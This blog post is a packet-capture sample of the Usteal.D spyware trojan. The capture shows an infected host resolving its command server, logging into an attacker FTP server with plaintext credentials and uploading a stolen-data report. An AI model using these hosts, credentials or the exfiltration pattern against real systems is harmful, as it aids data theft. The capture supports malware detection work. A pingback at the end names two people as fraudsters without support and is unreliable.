TrojanSpy:Win32/Usteal.D U Steal You Steal Spyware Trojan – Uses FTP to transfer your sensitive data out – Traffic Sample

By | June 19, 2015

TrojanSpy:Win32/Usteal.D is a dangerous trojan that collects sensitive information from its infected host and uses FTP to transfer the data to the command and control server

 

 

2013-03-07 06:57:38.635080 IP 10.0.2.15.1039 > 10.0.2.3.53: 18556+ A? jeck1072.ucoz[.]ru. (34)
E..>.7….”g

……5.*.;H|………..jeck1072.ucoz[.]ru…..
2013-03-07 06:57:38.665478 IP 10.0.2.3.53 > 10.0.2.15.1039: 18556 1/0/0 A 193.109.247.77 (50)
E..N….@.b.

….5…:..H|………..jeck1072.ucoz[.]ru………….8@…m.M
2013-03-07 06:57:38.942737 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [S], seq 3556468413, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.8@…5.
….m.M……f…..p….w……….
2013-03-07 06:57:39.060840 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [S.], seq 10240001, ack 3556468414, win 8192, options [mss 1460], length 0
E..,….@….m.M
………@…f.`. .3…….
2013-03-07 06:57:39.061096 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [.], ack 1, win 65535, length 0
E..(.9@…5.
….m.M……f…@.P…k…
2013-03-07 06:57:39.181074 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 1:251, ack 1, win 8760, length 250
E..”….@….m.M
………@…f.P.”8….220———- Welcome to Pure-FTPd ———-
220-You are user number 1 of 100 allowed.
220-Local time is now 14:57. Server port: 21.
220-This is a private system – No anonymous login
220 You will be disconnected after 15 minutes of inactivity.

2013-03-07 06:57:39.257397 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 1:17, ack 251, win 65285, length 16
E..8.:@…5.
….m.M……f…@.P…mb..USER 0jeck1072

2013-03-07 06:57:39.257958 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 17, win 8760, length 0
E..(….@….m.M
………@…f.P.”8HK..
2013-03-07 06:57:39.372634 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 251:293, ack 17, win 8760, length 42
E..R….@….m.M
………@…f.P.”8.u..331 User 0jeck1072 OK. Password required

2013-03-07 06:57:39.373089 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 17:37, ack 293, win 65243, length 20
E..<.;@…5.
….m.M……f…A&P…bj..PASS q1w2e3r433590

2013-03-07 06:57:39.373303 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 37, win 8760, length 0
E..(….@….m.M
………A&..f.P.”8H…
2013-03-07 06:57:41.483757 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 293:489, ack 37, win 8760, length 196
E…. ..@..).m.M
………A&..f.P.”8….230-User 0jeck1072 has group access to: 1002
230-OK. Current restricted directory is /
230-205 files used (0%) – authorized: 25600 files
230 2063 Kbytes used (0%) – authorized: 419840 Kb

2013-03-07 06:57:41.523577 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 37:62, ack 489, win 65047, length 25
E..A.<@…5.
….m.M……f…A.P…….MKD home/zxcvb/sdfhdrjf

2013-03-07 06:57:41.525790 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 62, win 8760, length 0
E..(.
..@….m.M
………A…f.P.”8G0..
2013-03-07 06:57:42.440643 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 489:632, ack 62, win 8760, length 143
E…….@..\.m.M
………A…f.P.”8C}..550-Can’t create directory: File exists
550-205 files used (0%) – authorized: 25600 files
550 2063 Kbytes used (0%) – authorized: 419840 Kb

2013-03-07 06:57:42.441111 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 62:87, ack 632, win 64904, length 25
E..A.=@…5.
….m.M……f…ByP…….CWD home/zxcvb/sdfhdrjf

2013-03-07 06:57:42.443788 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 87, win 8760, length 0
E..(….@….m.M
………By..g.P.”8F…
2013-03-07 06:57:42.559307 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 632:683, ack 87, win 8760, length 51
E..[….@….m.M
………By..g.P.”8W…250 OK. Current directory is /home/zxcvb/sdfhdrjf

2013-03-07 06:57:42.752931 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [.], ack 683, win 64853, length 0
E..(.>@…5.
….m.M……g…B.P..Uk7..
2013-03-07 06:58:39.626385 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 87:95, ack 683, win 64853, length 8
E..0.?@…5.
….m.M……g…B.P..U.5..TYPE I

2013-03-07 06:58:39.626458 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 95, win 8760, length 0
E..(….@….m.M
………B…g.P.”8FM..
2013-03-07 06:58:39.744427 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 683:713, ack 95, win 8760, length 30
E..F….@….m.M
………B…g.P.”8g…200 TYPE is now 8-bit binary

2013-03-07 06:58:39.873228 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 95:101, ack 713, win 64823, length 6
E….@@…5.
….m.M……g…B.P..7….PASV

2013-03-07 06:58:39.875848 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 101, win 8760, length 0
E..(….@….m.M
………B…g”P.”8F)..
2013-03-07 06:58:39.991528 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 713:765, ack 101, win 8760, length 52
E..\….@….m.M
………B…g”P.”8.+..227 Entering Passive Mode (193,109,247,77,172,247)

2013-03-07 06:58:39.992035 IP 10.0.2.15.1041 > 193.109.247.77.44279: Flags [S], seq 503059361, win 65535, options [mss 1460,nop,nop,sackOK], length 0
E..0.A@…5.
….m.M…………p……………
2013-03-07 06:58:40.110137 IP 193.109.247.77.44279 > 10.0.2.15.1041: Flags [S.], seq 18688001, ack 503059362, win 8192, options [mss 1460], length 0
E..,….@….m.M
………(…..`. ………
2013-03-07 06:58:40.110366 IP 10.0.2.15.1041 > 193.109.247.77.44279: Flags [.], ack 1, win 65535, length 0
E..(.B@…5.
….m.M……….(.P….D..
2013-03-07 06:58:40.110549 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [P.], seq 101:160, ack 765, win 64771, length 59
E..c.C@…5.
….m.M……g”..B.P…….STOR NO_PWDS_report_07-03-2013_05-57-03-4C33322F-IFLH.bin

2013-03-07 06:58:40.112781 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 160, win 8760, length 0
E..(….@….m.M
………B…g]P.”8E…
2013-03-07 06:58:40.228677 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 765:795, ack 160, win 8760, length 30
E..F….@….m.M
………B…g]P.”8^…150 Accepted data connection

2013-03-07 06:58:40.288726 IP 10.0.2.15.1041 > 193.109.247.77.44279: Flags [.], seq 1:1461, ack 1, win 65535, length 1460
E….D@…0.
….m.M……….(.P…….UFR!….x. …..@….qHR.7C..<..(…”…(..r.<h.`….. .y….Yp….6l…U..g..*..$.%7.%.7……:.,.J../6….8….,S..$|..G….y.,….tN..i..!….A…….%l#lGtm.T.#.U……j.3.&..A….c>……t….”.k..’h)…..3O..x…34i…d|vT..rT….+Y..J….[………g…D..L..R……<….x..D~.`n…..(P..i.q…Ac….m.o..Z..LPS.{Q……..I.%L..m..E{..Jr{e…gU}ra!|. …….1,q.rz.?.e..R…..zDg..|p………v.2B7.
.!…g0S…sk>/..*…S..n2..l&..mBY…….$.Wa8Q^…w…d.Q…&?h.d…A.|\…..UJ……I.z..ouXw.o…..]. ]…<A…..4.\.SUo..In+.8….7..p.”.z.U.7.@ef?5W*=….Kp,r.6u….
&L{^.d.0..V..M|J.dg.u… ..”p.O.
.^..!C8G..7..n…..\.x.2.P.`A*/..>.Y..r…B..y…….6i.-..N..]….2
…..6..v……q.z.>%P..n….r..jU~p…p..`.&….!..)..v…..f…_._….;………P….(…P,y….HH.+m…}…*hR.;~!…:.=..~…o…\Q.V…….X…u…+J?…#.1._rr….&..#..’.l.d…..X`.^E.(…{f…Z”a)..4..D.X|>.G.%.w..Y. ..U.[L*z….e..X.g…..z.QH;..S..E\K……..=…A9..D…2%.6….]….#s..@~.@…9>[d.o… …9S{.\..m
…s_……{..|..r.u……%l0….$9..PNScl.i.A.’…=[.]ru..$.^..’…(..?..e….n…’d………..^@.Z.&lMdj.m….RM)}(0o ..Ojs.Q7B…..z.8..R=…p/0.Rv.K…q…….P……w..>).<..J…..n..W…~X….:… .(<\.0z..N’..-.3:I.y..t…1ZH6…….G……A…J=M…z|.y..W.J5T…\3..oC.A”Bc…j…v.2……..r.n…..>……a~.j.u…].D…L.R……@A….0.. .\..|….us.G._…}….t….Q…T.u.e.c..-{.U..pP…….U.f5v…w..N..o.!..9\..{……r5;5..BCG.b.C8e+.l`..
2013-03-07 06:58:40.288780 IP 193.109.247.77.44279 > 10.0.2.15.1041: Flags [.], ack 1461, win 8760, length 0
E..(….@….m.M
………(….VP.”8.X..
2013-03-07 06:58:40.289188 IP 10.0.2.15.1041 > 193.109.247.77.44279: Flags [P.], seq 1461:1737, ack 1, win 65535, length 276
E..<.E@…4.
….m.M…….V..(.P…-D…%.
P……..0/…..,o.\..v.*..b.*..V..1..!..2…………..Th.2/..kHs…..=….A@@……R&N..}..\….Te.PI..k.&’.;%$..e..E…n7l.X..B.?..g.s…h……g.w……qg8…..}9._.U..m..”..P…E..c0J. ….,..M..1.y…Z.7..u9…..’B.R….u..ta..R.R.;l…..!..`.[.`…..A..\.u.Nc./….
2013-03-07 06:58:40.289199 IP 193.109.247.77.44279 > 10.0.2.15.1041: Flags [.], ack 1737, win 8760, length 0
E..(….@….m.M
………(….jP.”8.D..
2013-03-07 06:58:40.364013 IP 10.0.2.15.1041 > 193.109.247.77.44279: Flags [F.], seq 1737, ack 1, win 65535, length 0
E..(.F@…5.
….m.M…….j..(.P….{..
2013-03-07 06:58:40.364052 IP 193.109.247.77.44279 > 10.0.2.15.1041: Flags [.], ack 1738, win 8760, length 0
E..(….@….m.M
………(….kP.”8.C..
2013-03-07 06:58:40.438388 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [.], ack 795, win 64741, length 0
E..(.G@…5.
….m.M……g]..C.P…j…
2013-03-07 06:58:40.481915 IP 193.109.247.77.44279 > 10.0.2.15.1041: Flags [F.], seq 1, ack 1738, win 8760, length 0
E..(….@….m.M
………(….kP.”8.B..
2013-03-07 06:58:40.482181 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 795:889, ack 160, win 8760, length 94
E…….@….m.M
………C…g]P.”8….226-File successfully transferred
226 0.266 seconds (measured here), 6.37 Kbytes per second

2013-03-07 06:58:40.482227 IP 10.0.2.15.1041 > 193.109.247.77.44279: Flags [.], ack 2, win 65535, length 0
E..(.H@…5.
….m.M…….k..(.P….z..
2013-03-07 06:58:40.483280 IP 10.0.2.15.1040 > 193.109.247.77.21: Flags [F.], seq 160, ack 889, win 64647, length 0
E..(.I@…5.
….m.M……g]..CzP…j…
2013-03-07 06:58:40.483330 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [.], ack 161, win 8760, length 0
E..(….@….m.M
………Cz..g^P.”8E=..
2013-03-07 06:58:40.601517 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [P.], seq 889:902, ack 161, win 8760, length 13
E..5….@….m.M
………Cz..g^P.”8{u..226 Logout.

2013-03-07 06:58:40.601573 IP 193.109.247.77.21 > 10.0.2.15.1040: Flags [F.], seq 902, ack 161, win 8760, length 0
E..(….@….m.M
………C…g^P.”8E/..

 

Share Button

One thought on “TrojanSpy:Win32/Usteal.D U Steal You Steal Spyware Trojan – Uses FTP to transfer your sensitive data out – Traffic Sample

  1. Pingback: Margaret Cunniffe and David Brown are Australian Fraudsters based in Melbourne Victoria claim to raise money for charities via Synergize Vip Vip Club and Connect Network Fundraise but are nothing more than con-artists.

Leave a Reply

Your email address will not be published. Required fields are marked *